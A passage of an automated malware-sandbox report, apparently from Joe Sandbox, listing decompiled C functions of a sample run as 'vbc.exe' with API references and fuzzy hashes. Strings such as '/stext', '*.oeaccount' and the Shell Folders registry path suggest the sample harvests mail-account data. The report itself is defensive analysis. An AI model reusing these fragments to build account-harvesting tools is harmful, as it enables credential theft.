                                                              0x00411972

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                              • Instruction ID: d6dbe33ea61767d3fff50222484a645f5af73bc96bc71b3580d13e53834dfd00
                                                              • Opcode Fuzzy Hash: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                              • Instruction Fuzzy Hash: E0E012B0319201A68E20AB7BBD40A9323AE2A44310354806FF206D2AB1DE38D8C0C63C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 78%
                                                              			E0040787D() {
                                                              				void* _t13;
                                                              				signed int _t16;
                                                              				signed int _t18;
                                                              				signed int _t27;
                                                              				signed int _t29;
                                                              				intOrPtr _t33;
                                                              
                                                              				_t33 =  *0x417540;
                                                              				if(_t33 == 0) {
                                                              					_push(0x8000);
                                                              					 *0x417540 = 0x8000;
                                                              					 *0x417544 = 0x100;
                                                              					 *0x417548 = 0x1000; // executed
                                                              					L004115D0(); // executed
                                                              					 *0x417528 = 0x8000;
                                                              					_t27 = 4;
                                                              					_t16 =  *0x417544 * _t27;
                                                              					_push( ~(0 | _t33 > 0x00000000) | _t16);
                                                              					L004115D0();
                                                              					 *0x417530 = _t16;
                                                              					_t29 = 4;
                                                              					_t18 =  *0x417544 * _t29;
                                                              					_push( ~(0 | _t33 > 0x00000000) | _t18);
                                                              					L004115D0();
                                                              					_push( *0x417548);
                                                              					 *0x417534 = _t18; // executed
                                                              					L004115D0(); // executed
                                                              					 *0x41752c = _t18;
                                                              					return _t18;
                                                              				}
                                                              				return _t13;
                                                              			}









                                                              0x0040787d
                                                              0x00407884
                                                              0x0040788b
                                                              0x0040788c
                                                              0x00407891
                                                              0x0040789b
                                                              0x004078a5
                                                              0x004078aa
                                                              0x004078b8
                                                              0x004078b9
                                                              0x004078c2
                                                              0x004078c3
                                                              0x004078c8
                                                              0x004078d6
                                                              0x004078d7
                                                              0x004078e0
                                                              0x004078e1
                                                              0x004078e6
                                                              0x004078ec
                                                              0x004078f1
                                                              0x004078f9
                                                              0x00000000
                                                              0x004078f9
                                                              0x004078fe

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@
                                                              • String ID:
                                                              • API String ID: 1033339047-0
                                                              • Opcode ID: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                              • Instruction ID: 98653883aa4781a1616f5f21c4e99a92f1a36013e955d8e4b32a99e29624f39b
                                                              • Opcode Fuzzy Hash: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                              • Instruction Fuzzy Hash: E6F012B1589210BFDB549B39ED067A53AB2A748394F10917EE207CA6F5FB7454408B4C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004060FA(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
                                                              				void* _t8;
                                                              				void* _t13;
                                                              				signed int _t16;
                                                              				void** _t21;
                                                              				signed int _t22;
                                                              
                                                              				_t21 = __edi;
                                                              				_t22 =  *__eax;
                                                              				if(__edx < _t22) {
                                                              					return 0;
                                                              				} else {
                                                              					_t13 =  *__edi;
                                                              					do {
                                                              						 *__eax =  *__eax + _a8;
                                                              						_t16 =  *__eax;
                                                              					} while (__edx >= _t16);
                                                              					_t8 = malloc(_t16 * _a4); // executed
                                                              					 *__edi = _t8;
                                                              					if(_t22 > 0) {
                                                              						if(_t8 != 0) {
                                                              							memcpy(_t8, _t13, _t22 * _a4);
                                                              						}
                                                              						free(_t13);
                                                              					}
                                                              					return 0 |  *_t21 != 0x00000000;
                                                              				}
                                                              			}








                                                              0x004060fa
                                                              0x004060fb
                                                              0x004060ff
                                                              0x0040614a
                                                              0x00406101
                                                              0x00406102
                                                              0x00406104
                                                              0x00406108
                                                              0x0040610a
                                                              0x0040610c
                                                              0x00406116
                                                              0x0040611e
                                                              0x00406120
                                                              0x00406124
                                                              0x0040612e
                                                              0x00406133
                                                              0x00406137
                                                              0x0040613c
                                                              0x00406146
                                                              0x00406146

                                                              APIs
                                                              • malloc.MSVCRT ref: 00406116
                                                              • memcpy.MSVCRT ref: 0040612E
                                                              • free.MSVCRT(00000000,00000000,74B04DE0,00406B49,00000001,?,00000000,74B04DE0,00406D88,00000000,?,?), ref: 00406137
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: freemallocmemcpy
                                                              • String ID:
                                                              • API String ID: 3056473165-0
                                                              • Opcode ID: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                              • Instruction ID: d153bd7f556b54fa1e8e463c7175d954409fdcf13f6af5892cc53e784d19f72a
                                                              • Opcode Fuzzy Hash: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                              • Instruction Fuzzy Hash: 9DF0E9726052219FC7089F79B98145BB3DDAF84324B11482FF546D7292D7389C50C798
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E0040B8D7(void* __edi, void* __eflags) {
                                                              				void* __esi;
                                                              				signed int _t24;
                                                              				intOrPtr _t31;
                                                              				intOrPtr _t38;
                                                              				void* _t42;
                                                              				void* _t45;
                                                              				void* _t49;
                                                              				void* _t51;
                                                              				intOrPtr _t52;
                                                              
                                                              				_t54 = __eflags;
                                                              				_t49 = __edi;
                                                              				_t38 = 0;
                                                              				E004023D4( *((intOrPtr*)(__edi + 0x370)), __eflags, 0, 0);
                                                              				 *((intOrPtr*)(__edi + 0x108)) = 0;
                                                              				E00401E8B(_t54,  *((intOrPtr*)(__edi + 0x370)) + 0xb20); // executed
                                                              				_t24 =  *((intOrPtr*)(__edi + 0x37c));
                                                              				if( *((intOrPtr*)(_t24 + 0x30)) <= 0) {
                                                              					_t51 = 0x412466;
                                                              				} else {
                                                              					if( *((intOrPtr*)(_t24 + 0x1c)) <= 0) {
                                                              						_t45 = 0;
                                                              						__eflags = 0;
                                                              					} else {
                                                              						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)))) +  *((intOrPtr*)(_t24 + 0x10));
                                                              					}
                                                              					_t51 = _t45;
                                                              				}
                                                              				_push(_t51);
                                                              				_push("/stext");
                                                              				L004115B2();
                                                              				if(_t24 != 0) {
                                                              					_t52 = E0040B841(_t24, _t51);
                                                              					__eflags = _t52 - _t38;
                                                              					if(_t52 <= _t38) {
                                                              						goto L15;
                                                              					}
                                                              					goto L9;
                                                              				} else {
                                                              					_t52 = 1;
                                                              					L9:
                                                              					E0040AF17(_t49, _t38); // executed
                                                              					E0040A5AC(_t49);
                                                              					_t31 =  *((intOrPtr*)(_t49 + 0x37c));
                                                              					if( *((intOrPtr*)(_t31 + 0x30)) <= 1) {
                                                              						_t42 = 0x412466;
                                                              					} else {
                                                              						_t59 =  *((intOrPtr*)(_t31 + 0x1c)) - 1;
                                                              						if( *((intOrPtr*)(_t31 + 0x1c)) <= 1) {
                                                              							_t42 = 0;
                                                              						} else {
                                                              							_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)) + 4)) +  *((intOrPtr*)(_t31 + 0x10));
                                                              						}
                                                              					}
                                                              					 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x370)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x36c)) + 0xc));
                                                              					E00409B32( *((intOrPtr*)(_t49 + 0x370)),  *((intOrPtr*)(_t49 + 0x370)), _t49, _t59, _t42, _t52); // executed
                                                              					_t38 = 1;
                                                              					E0040B0C2(_t49);
                                                              					L15:
                                                              					return _t38;
                                                              				}
                                                              			}












                                                              0x0040b8d7
                                                              0x0040b8d7
                                                              0x0040b8e0
                                                              0x0040b8e4
                                                              0x0040b8f5
                                                              0x0040b8fb
                                                              0x0040b900
                                                              0x0040b909
                                                              0x0040b920
                                                              0x0040b90b
                                                              0x0040b90e
                                                              0x0040b91a
                                                              0x0040b91a
                                                              0x0040b910
                                                              0x0040b915
                                                              0x0040b915
                                                              0x0040b91c
                                                              0x0040b91c
                                                              0x0040b925
                                                              0x0040b926
                                                              0x0040b92b
                                                              0x0040b934
                                                              0x0040b940
                                                              0x0040b942
                                                              0x0040b944
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040b936
                                                              0x0040b938
                                                              0x0040b946
                                                              0x0040b949
                                                              0x0040b950
                                                              0x0040b955
                                                              0x0040b95f
                                                              0x0040b976
                                                              0x0040b961
                                                              0x0040b961
                                                              0x0040b965
                                                              0x0040b972
                                                              0x0040b967
                                                              0x0040b96d
                                                              0x0040b96d
                                                              0x0040b965
                                                              0x0040b98b
                                                              0x0040b998
                                                              0x0040b9a1
                                                              0x0040b9a2
                                                              0x0040b9a8
                                                              0x0040b9ac
                                                              0x0040b9ac

                                                              APIs
                                                                • Part of subcall function 00401E8B: memset.MSVCRT ref: 00401EAD
                                                                • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401EC6
                                                                • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401ED4
                                                                • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F1A
                                                                • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F28
                                                              • _stricmp.MSVCRT(/stext,00412466,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B92B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strlen$_stricmpmemset
                                                              • String ID: /stext
                                                              • API String ID: 3575250601-3817206916
                                                              • Opcode ID: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                              • Instruction ID: 7d69c3f5364ef88ad9e24340ba35af89a1d621815374fdce2acadc9eabf4c73c
                                                              • Opcode Fuzzy Hash: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                              • Instruction Fuzzy Hash: 45213EB1614111DFC35C9B29C881D65B3A8FB45314B1582BFF91AA7292C738ED518BCD
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00406252() {
                                                              				struct tagLOGFONTA _v64;
                                                              				struct HFONT__* _t6;
                                                              
                                                              				E00406191( &_v64, "Arial", 0xe, 0);
                                                              				_t6 = CreateFontIndirectA( &_v64); // executed
                                                              				return _t6;
                                                              			}





                                                              0x00406264
                                                              0x00406270
                                                              0x00406277

                                                              APIs
                                                                • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                                • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                              • CreateFontIndirectA.GDI32(?), ref: 00406270
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFontIndirectmemsetstrcpy
                                                              • String ID: Arial
                                                              • API String ID: 3275230829-493054409
                                                              • Opcode ID: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                              • Instruction ID: 9d865b7f43533acfebf3b00b6ce8d331e43bccbbf35dbaed0a6f3a0435680c9f
                                                              • Opcode Fuzzy Hash: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                              • Instruction Fuzzy Hash: B3D0C970E4020D76E600BAA0FD07B897BAC5B00605F508421BA41F51E2FAE8A15586A9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004047A0(CHAR* __esi, void* __eflags) {
                                                              				struct HINSTANCE__* _t8;
                                                              				char _t12;
                                                              				char* _t15;
                                                              				CHAR* _t17;
                                                              
                                                              				_t17 = __esi;
                                                              				E004047F1(__esi);
                                                              				_t8 = LoadLibraryA(__esi); // executed
                                                              				__esi[0x200] = _t8;
                                                              				if(_t8 != 0) {
                                                              					_t12 = GetProcAddress(_t8,  &(__esi[0xff]));
                                                              					__esi[0x208] = _t12;
                                                              					if(_t12 != 0) {
                                                              						__esi[0x204] = 1;
                                                              					}
                                                              				}
                                                              				_t15 =  &(_t17[0x204]);
                                                              				if( *_t15 == 0) {
                                                              					E004047F1(_t17);
                                                              				}
                                                              				return  *_t15;
                                                              			}







                                                              0x004047a0
                                                              0x004047a2
                                                              0x004047a8
                                                              0x004047b0
                                                              0x004047b6
                                                              0x004047c0
                                                              0x004047c8
                                                              0x004047ce
                                                              0x004047d0
                                                              0x004047d0
                                                              0x004047ce
                                                              0x004047db
                                                              0x004047e4
                                                              0x004047e8
                                                              0x004047e8
                                                              0x004047f0

                                                              APIs
                                                                • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                              • LoadLibraryA.KERNELBASE(?,0040D60E,80000001,75D6F420), ref: 004047A8
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc
                                                              • String ID:
                                                              • API String ID: 145871493-0
                                                              • Opcode ID: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                              • Instruction ID: bd92e302f737a6b7e7c2aa8ed3bd721d1bcdfa8038008227cdd2def65d6b9a1b
                                                              • Opcode Fuzzy Hash: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                              • Instruction Fuzzy Hash: F1F039B02007028BD7209F39D84879B77E8BF85700F00853EF266E3281EB78A951CB28
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetPrivateProfileIntA.KERNEL32 ref: 0040EB35
                                                                • Part of subcall function 0040EA26: memset.MSVCRT ref: 0040EA44
                                                                • Part of subcall function 0040EA26: _itoa.MSVCRT ref: 0040EA5B
                                                                • Part of subcall function 0040EA26: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040EA6A
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: PrivateProfile$StringWrite_itoamemset
                                                              • String ID:
                                                              • API String ID: 4165544737-0
                                                              • Opcode ID: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                              • Instruction ID: f55a197cdd86fa31c53d12907dd8f70643f2484b8232c3448506387801693677
                                                              • Opcode Fuzzy Hash: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                              • Instruction Fuzzy Hash: F2E0B632000109FBCF125F95EC01AAA7F76FF08314F148869FD5855161D332A570EF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004047F1(void* __eax) {
                                                              				struct HINSTANCE__* _t5;
                                                              				signed int* _t7;
                                                              
                                                              				 *(__eax + 0x204) =  *(__eax + 0x204) & 0x00000000;
                                                              				_t7 = __eax + 0x200;
                                                              				_t5 =  *_t7;
                                                              				if(_t5 != 0) {
                                                              					_t5 = FreeLibrary(_t5); // executed
                                                              					 *_t7 =  *_t7 & 0x00000000;
                                                              				}
                                                              				return _t5;
                                                              			}





                                                              0x004047f1
                                                              0x004047f9
                                                              0x004047ff
                                                              0x00404803
                                                              0x00404806
                                                              0x0040480c
                                                              0x0040480c
                                                              0x00404810

                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                              • Instruction ID: 9a892a7b4d94419058e15305363ecf1fbcdc16662e35282e5c511663eadef616
                                                              • Opcode Fuzzy Hash: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                              • Instruction Fuzzy Hash: 90D012721003118FD7705F14EC0CBE133E8AF40312F2584B8EA55E7155C3749584CA58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00405EE4(CHAR* _a4) {
                                                              				void* _t3;
                                                              
                                                              				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
                                                              				return _t3;
                                                              			}




                                                              0x00405ef6
                                                              0x00405efc

                                                              APIs
                                                              • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409B54,00000000,00000000,00000000,00412466,00412466,?,0040B99D,00412466), ref: 00405EF6
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                              • Instruction ID: 5973f86ffe51395cbbea2b6db375788de2bc2c82441068c359f9d196895a4387
                                                              • Opcode Fuzzy Hash: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                              • Instruction Fuzzy Hash: F7C092B0290201BEFF208A10AD0AF77295DE780700F10C4207A00E40E0D2A14C109A24
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040E894(void* __esi) {
                                                              				struct HINSTANCE__* _t6;
                                                              				int _t7;
                                                              
                                                              				_t6 =  *(__esi + 8);
                                                              				 *(__esi + 0xc) =  *(__esi + 0xc) & 0x00000000;
                                                              				if(_t6 != 0) {
                                                              					_t7 = FreeLibrary(_t6); // executed
                                                              					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
                                                              					return _t7;
                                                              				}
                                                              				return _t6;
                                                              			}





                                                              0x0040e894
                                                              0x0040e897
                                                              0x0040e89d
                                                              0x0040e8a0
                                                              0x0040e8a6
                                                              0x00000000
                                                              0x0040e8a6
                                                              0x0040e8aa

                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                              • Instruction ID: 5028da6d49437ecb3f89885db84a6a431b650c8c1a4919c17fb61c23058b4b99
                                                              • Opcode Fuzzy Hash: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                              • Instruction Fuzzy Hash: 80C04C31110B018FE7219B12C949753B7E4BF00317F44C868955BD58A4D77CE4A4CE18
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040ED91(struct HINSTANCE__* _a4, CHAR* _a8) {
                                                              
                                                              				EnumResourceNamesA(_a4, _a8, E0040ED0B, 0); // executed
                                                              				return 1;
                                                              			}



                                                              0x0040eda0
                                                              0x0040eda9

                                                              APIs
                                                              • EnumResourceNamesA.KERNEL32 ref: 0040EDA0
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnumNamesResource
                                                              • String ID:
                                                              • API String ID: 3334572018-0
                                                              • Opcode ID: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                              • Instruction ID: b68387c5c0e4344f5c23b4f6c0320e636f75da40900f583e81955e3ef688938f
                                                              • Opcode Fuzzy Hash: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                              • Instruction Fuzzy Hash: 11C09B31594342D7C7119F109D09F1B7A95FF58701F158C3D7251D40E0C7614034D605
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00406F5B(signed int* __esi) {
                                                              				int _t2;
                                                              				void* _t3;
                                                              
                                                              				_t3 =  *__esi;
                                                              				if(_t3 != 0xffffffff) {
                                                              					_t2 = FindClose(_t3); // executed
                                                              					 *__esi =  *__esi | 0xffffffff;
                                                              					return _t2;
                                                              				}
                                                              				return 0;
                                                              			}





                                                              0x00406f5b
                                                              0x00406f62
                                                              0x00406f65
                                                              0x00406f6b
                                                              0x00000000
                                                              0x00406f6b
                                                              0x00406f6e

                                                              APIs
                                                              • FindClose.KERNELBASE(?,00406E75,?,?,00000000,rA,00410C7E,*.oeaccount,rA,?,00000104), ref: 00406F65
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                              • Instruction ID: b31b0b49456476ea20311e3f3804ac2d10f8d6de1d59c17087b16cfdac6e9e38
                                                              • Opcode Fuzzy Hash: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                              • Instruction Fuzzy Hash: 67C048351145029AD22C9B38AA5942A77A2AA493303B50B6CB1F3D20E0E77884628A04
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040614B(CHAR* _a4) {
                                                              				long _t4;
                                                              
                                                              				_t4 = GetFileAttributesA(_a4); // executed
                                                              				return 0 | _t4 != 0xffffffff;
                                                              			}




                                                              0x0040614f
                                                              0x0040615f

                                                              APIs
                                                              • GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                              • Instruction ID: f3b66c96cd424dd7ad3beae2567feb80d20b4231abd0f1b127a655f441aacc1c
                                                              • Opcode Fuzzy Hash: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                              • Instruction Fuzzy Hash: CAB012752100005BCB0807349D4608E75505F45631720873CB033D00F0D730CC71BB01
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040EB3F(void* _a4, char* _a8, void** _a12) {
                                                              				long _t4;
                                                              
                                                              				_t4 = RegOpenKeyExA(_a4, _a8, 0, 0x20019, _a12); // executed
                                                              				return _t4;
                                                              			}




                                                              0x0040eb52
                                                              0x0040eb58

                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                              • Instruction ID: fbac0a3e3d82dbf35b582ab386aad6bc4faf60f338d600bbfef3ad5534bed626
                                                              • Opcode Fuzzy Hash: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                              • Instruction Fuzzy Hash: 60C09B35544301BFDE118F40EE05F09BF62BB88B01F104814B394740B1C3718424FB17
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              C-Code - Quality: 87%
                                                              			E00402D9A(void* __ecx, void* __edi, void* __esi, void* __fp0, signed int _a4, void* _a8) {
                                                              				signed int _v8;
                                                              				char _v20;
                                                              				char _v24;
                                                              				char _v152;
                                                              				char _v280;
                                                              				char _v408;
                                                              				intOrPtr _v412;
                                                              				char _v668;
                                                              				char _v796;
                                                              				intOrPtr _v800;
                                                              				char _v928;
                                                              				char _v940;
                                                              				char _v952;
                                                              				char _v956;
                                                              				char _v1084;
                                                              				char _v1212;
                                                              				char _v1340;
                                                              				intOrPtr _v1344;
                                                              				char _v1600;
                                                              				char _v1728;
                                                              				intOrPtr _v1732;
                                                              				char _v1860;
                                                              				char _v1872;
                                                              				void* _t59;
                                                              				signed int _t60;
                                                              				intOrPtr _t63;
                                                              				void* _t113;
                                                              				void* _t118;
                                                              				void* _t122;
                                                              				char* _t123;
                                                              				void* _t141;
                                                              
                                                              				_t141 = __fp0;
                                                              				_t118 = __edi;
                                                              				_t113 = __ecx;
                                                              				_t59 = E0040EB3F(_a4, _a8,  &_a8);
                                                              				if(_t59 == 0) {
                                                              					_t60 = 0x7d;
                                                              					_a4 = _t60;
                                                              					_v8 = _t60;
                                                              					E004021D8( &_v1872);
                                                              					E004021D8( &_v940);
                                                              					_t63 = 2;
                                                              					_v1732 = _t63;
                                                              					_v800 = _t63;
                                                              					_push( &_v928);
                                                              					_push("DisplayName");
                                                              					_push(_a8);
                                                              					_v1344 = 4;
                                                              					_t122 = 0x7f;
                                                              					_v412 = 1;
                                                              					E0040EB80(_t122, _t113);
